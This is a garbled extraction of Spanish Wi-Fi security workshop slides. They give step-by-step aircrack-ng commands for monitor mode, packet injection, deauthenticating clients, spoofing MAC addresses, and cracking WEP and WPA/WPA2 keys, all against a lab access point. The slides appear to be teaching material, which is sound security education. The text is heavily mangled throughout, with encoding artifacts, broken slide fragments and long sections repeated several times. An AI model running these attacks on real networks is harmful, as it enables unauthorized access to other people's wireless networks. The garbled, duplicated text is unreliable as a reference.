Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 33: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 34: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

